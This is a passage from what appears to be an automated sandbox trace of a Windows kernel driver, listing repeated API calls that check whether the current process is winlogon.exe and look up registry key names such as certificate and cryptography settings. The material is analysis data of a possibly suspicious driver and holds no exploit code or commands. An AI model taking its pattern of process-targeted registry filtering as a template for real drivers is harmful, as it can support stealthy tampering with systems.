| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
Execution Path #52 (length: 15, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 15 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc53750 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
Execution Path #182 (length: 51, count: 1, processes: 1 incomplete)
»
| Information | Value |
|---|---|
| Sequence Length | 51 |
Processes
»
| Process | Count |
|---|---|
| Process 9 (svchost.exe, PID: 972) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a458540 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a458990 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a458540 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a458990 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a458540 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a458990 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a458540 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a458990 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a458540 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a458990 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a458540 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a458990 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a458540 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a458990 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a458540 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a458990 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a458540 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a458990 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a458540 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a458990 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a458540 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a458990 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a458540 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a458990 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a458540 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a458990 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a458540 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a458990 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a458540 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a458990 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a458540 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a458990 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a458540 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a458990 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
Execution Path #152 (length: 9, count: 3, processes: 3)
»
| Information | Value |
|---|---|
| Sequence Length | 9 |
Processes
»
| Process | Count |
|---|---|
| Process 10 (svchost.exe, PID: 1000) | 1 |
| Process 30 (explorer.exe, PID: 1184) | 1 |
| Process 42 (iexplore.exe, PID: 556) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
Execution Path #148 (length: 33, count: 2, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 33 |
Processes
»
| Process | Count |
|---|---|
| Process 16 (officeclicktorun.exe, PID: 1740) | 2 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
Execution Path #188 (length: 11812, count: 1, processes: 1 incomplete)
»
| Information | Value |
|---|---|
| Sequence Length | 11812 |
Processes
»
| Process | Count |
|---|---|
| Process 16 (officeclicktorun.exe, PID: 1740) | 1 |
Sequence
»
| Symbol | Parameters | ||||
|---|---|---|---|---|---|
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91168e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xaa, ret_val_ptr_out = 0xffffe0003af7df50 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91168e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xa8, ret_val_ptr_out = 0xffffe0003af7de90 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91168e0, Length = 0xa8, ObjectNameInfo_unk_out = 0xffffe0003af7de90, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7de90, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7df50, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf2, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf0, ret_val_ptr_out = 0xffffe0003a763f10 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9fbee80, Length = 0xf0, ObjectNameInfo_unk_out = 0xffffe0003a763f10, ReturnLength_ptr_out = 0xffffd00032ab6c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763f10, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbee80, ret_val_out = 1 | ||||
